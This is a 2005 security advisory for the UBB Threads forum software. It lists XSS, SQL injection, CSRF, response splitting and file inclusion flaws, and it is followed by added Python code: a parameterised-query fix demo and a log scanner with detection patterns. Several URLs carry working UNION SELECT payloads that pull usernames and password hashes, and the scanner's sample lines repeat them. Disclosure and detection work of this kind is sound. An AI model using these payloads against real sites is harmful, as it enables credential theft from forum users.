25 Jun 2005, reported by James Bercegay (source: packetstorm, packetstormsecurity.com)

UBB Threads Vulnerabilities, Cross Site Scripting, SQL Injectio

##########################################################
# GulfTech Security Research June 23rd, 2005  
##########################################################  
# Vendor : Infopop Corporation  
# URL : http://www.ubbcentral.com/ubbthreads/  
# Version : All Versions Prior To 6.5.2 Beta  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
  
Description:  
UBB Threads is a very popular forum system developed by Infopop.  
There are a number of vulnerabilities in UBB Threads that may allow  
an attacker to execute cross site scripting, http response splitting,  
and cross site request forgery attacks. Also, an attacker may include,  
execute, or read arbitrary local files. These vulnerabilities may allow  
for an attacker to completely compromise an installation of UBB Threads  
and possibly more. Users are encouraged to upgrade as soon as possible  
to the latest UBB Threads release.  
  
  
  
Cross Site Scripting:
There are a large number of cross site scripting issues in UBB Threads.
Due to the large number of examples, I will simply put [XSS] where an
attacker might place offending code. Some examples might look like this:
  
http://ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic=  
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showflat&fpart=1&vc=1  
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]&fpart=1&vc=1  
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&fpart=1&vc=1  
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat&page=0&fpart=1&vc=1  
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat&page=0&fpart=1&vc=1  
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&page=0&fpart=1&vc=1  
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS]  
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all  
http://ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1  
  
These vulnerabilities can be used to steal sensitive information from a
user, and possibly lead to malicious code execution in the context of
the victim's browser.
  
  
  
SQL Injection:
There are a number of SQL Injection issues in UBB Threads that allow an
attacker to influence, or disclose sensitive information in, the
underlying database. Below are some examples.
  
http://ubbt/download.php?Number=42227[SQL]  
http://ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]  
http://ubbt/calendar.php?Cat=&month=7[SQL]&year=2005  
http://ubbt/modifypost.php?Cat=0&Username=foobar&Number=
[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup  
&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&  
preview=1&peditdelete=Delete+this+post  
  
The above are just examples, and will not do anything except maybe
trigger an error, but I will provide a few examples of how these
vulnerabilities could be exploited. First, there is an SQL Injection
issue that occurs when emailing a thread to someone:
  
http://ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username  
,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&  
fpart=1&what=showflat  
  
Visiting a URL like the one above by itself will not cause much to
happen, but if you complete the form, you will notice an email arrives
at the address you specified in the form, and the contents of that
email are the contents you queried from the database! Also, in the
private messaging feature there is another serious SQL Injection issue.
  
http://ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,  
0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received  
  
A URL like the one above would yield user 'foobar's password hash and
username.
  
http://ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=  
0&vc=1&fpart=1&what=showflat  
http://ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded  
http://ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]  
  
Also, there are a few SQL Injection issues that require the POST method.
For example, when rating a profile, a post, or anything else (they all
use the same feature) you can specify arbitrary SQL statements in the
"Main" parameter. Also, when conducting a search an attacker may specify
arbitrary SQL statements in the "Forum[]" array and have them execute
successfully with the privileges of the current MySQL user.
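As an added illustration (not code from the advisory or from UBB Threads) of why the mailthread.php injection works and how the fix closes it: a toy SQLite stand-in runs the advisory's own payload through a string-concatenated query and through a typed, parameterised one. The w3t_Posts table name, its columns and the stored hash value are assumptions made for this example.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in: w3t_Users is the table named in the
    # advisory; w3t_Posts is an assumed name for the posts table.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE w3t_Users (U_Username TEXT, U_Password TEXT);
        INSERT INTO w3t_Users VALUES ('victim', 'constructed-hash-0000');
        CREATE TABLE w3t_Posts (Number INTEGER, Subject TEXT);
        INSERT INTO w3t_Posts VALUES (42227, 'Pruning old posts');
    """)
    return db

def lookup_post_vulnerable(db, number):
    # The request parameter is pasted into the SQL text, so a quote in it
    # closes the literal and whatever follows is parsed as SQL.
    sql = f"SELECT Number, Subject FROM w3t_Posts WHERE Number = '{number}'"
    return db.execute(sql).fetchall()

def lookup_post_fixed(db, number):
    # Enforce the parameter's real type, then bind it: the database receives
    # the value as data and never parses it as SQL.
    try:
        number = int(number)
    except (TypeError, ValueError):
        raise ValueError("Number must be an integer") from None
    return db.execute(
        "SELECT Number, Subject FROM w3t_Posts WHERE Number = ?", (number,)
    ).fetchall()

# The mailthread.php payload quoted in the advisory, URL-decoded.
PAYLOAD = ("-99' UNION SELECT U_Username,U_Password FROM w3t_Users "
           "WHERE U_Username = 'victim'/*")

def demo():
    db = make_db()
    leaked = lookup_post_vulnerable(db, PAYLOAD)  # rows come from w3t_Users
    try:
        lookup_post_fixed(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked

if __name__ == "__main__":
    print(demo())  # ([('victim', 'constructed-hash-0000')], True)
```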
  
  
  
Cross Site Request Forgery:
There are a number of CSRF issues in UBB Threads, and these issues allow
an attacker to make a user unwillingly change their ignore and address
settings.
  
http://ubbt/addaddress.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1  
http://ubbt/toggleignore.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1  
http://ubbt/removeignore.php?Cat=&User=123  
http://ubbt/removeaddress.php?Cat=&User=123  
  
These issues really affect privacy on the forums, and make it nearly
impossible to keep away from any harassing members :)
  
  
HTTP Response Splitting:
There are several HTTP Response Splitting issues in UBB Threads. These
issues allow an attacker to manipulate headers sent back to the user,
and may allow for code execution in the context of the victim's browser.
The "Cat" parameter in the files toggleshow.php, togglecats.php, and
showprofile.php is vulnerable in each case.
  
  
  
Local File Inclusion:
UBB Threads suffers from a local file inclusion vulnerability when
handling language preferences extracted from the cookie. The "language"
parameter is never sanitized and can thus be exploited by specifying an
arbitrary file location appended with a null byte (%00). This could
lead to code execution, or in most cases, file disclosure.
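An added detection example, not part of the advisory: a small Python scanner that applies the advisory's bug classes (XSS markers in any parameter, UNION-based SQL injection, CR/LF in the "Cat" parameter of the three named scripts, and null bytes or traversal in the language cookie) to request log lines. The log layout, the client addresses and the sample lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote
# Value-level rules for the advisory's bug classes, applied after URL decoding
# so that %3C, %20 or %00 cannot hide a payload from the check.
XSS_RE = re.compile(r"<\s*script|on\w+\s*=|javascript:", re.I)
SQLI_RE = re.compile(r"\bunion\b[\s\S]*\bselect\b|'\s*(or|and)\b|/\*", re.I)
CRLF_RE = re.compile(r"[\r\n]")
LFI_RE = re.compile(r"\x00|\.\./")
# Scripts whose "Cat" parameter the advisory names as response-splitting sinks.
SPLIT_SCRIPTS = {"toggleshow.php", "togglecats.php", "showprofile.php"}

def classify_request(target, cookies):
    """Return the set of advisory bug classes a request target and cookies match."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    findings = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if XSS_RE.search(value):
            findings.add("xss")
        if SQLI_RE.search(value):
            findings.add("sqli")
        if name == "Cat" and script in SPLIT_SCRIPTS and CRLF_RE.search(value):
            findings.add("response_splitting")
    if LFI_RE.search(unquote(cookies.get("language", ""))):
        findings.add("lfi")
    return findings
# Constructed log layout for this example (not Apache's): client "request" status "cookies"
LOG_RE = re.compile(r'^(\S+) "(\w+) (\S+) HTTP/[\d.]+" (\d{3}) "([^"]*)"$')

def scan_log(lines):
    hits = []  # (client, script path, sorted bug classes) per matching line
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status, cookie_hdr = m.groups()
        cookies = dict(c.strip().split("=", 1) for c in cookie_hdr.split(";") if "=" in c)
        found = classify_request(target, cookies)
        if found:
            hits.append((client, target.split("?", 1)[0], sorted(found)))
    return hits
# Constructed sample lines modelled on the advisory's URLs; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 "GET /ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0 HTTP/1.1" 200 "language=english"',
    '10.0.0.7 "GET /ubbt/showmembers.php?Cat=&like=p%3Cscript%3Ealert(1)%3C/script%3E&sb=1 HTTP/1.1" 200 "language=english"',
    '10.0.0.9 "GET /ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users/*&status=N HTTP/1.1" 200 "language=english"',
    '10.0.0.9 "GET /ubbt/togglecats.php?Cat=0%0d%0aX-Injected:%201 HTTP/1.1" 302 "language=english"',
    '10.0.0.11 "GET /ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173 HTTP/1.1" 200 "language=../../../some/file%00"',
]
```

Running `scan_log(SAMPLE_LOG)` flags four of the five lines, one per bug class; the CSRF issues leave no such marker in a request and need session-bound tokens rather than log rules.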
  
  
Solution:
An updated version of UBB Threads has been released to address the
previously mentioned issues, and users are strongly advised to upgrade
immediately.
  
http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351  
  
Users can visit the above URL to get information regarding UBB Threads
security updates.
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00084-06232005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
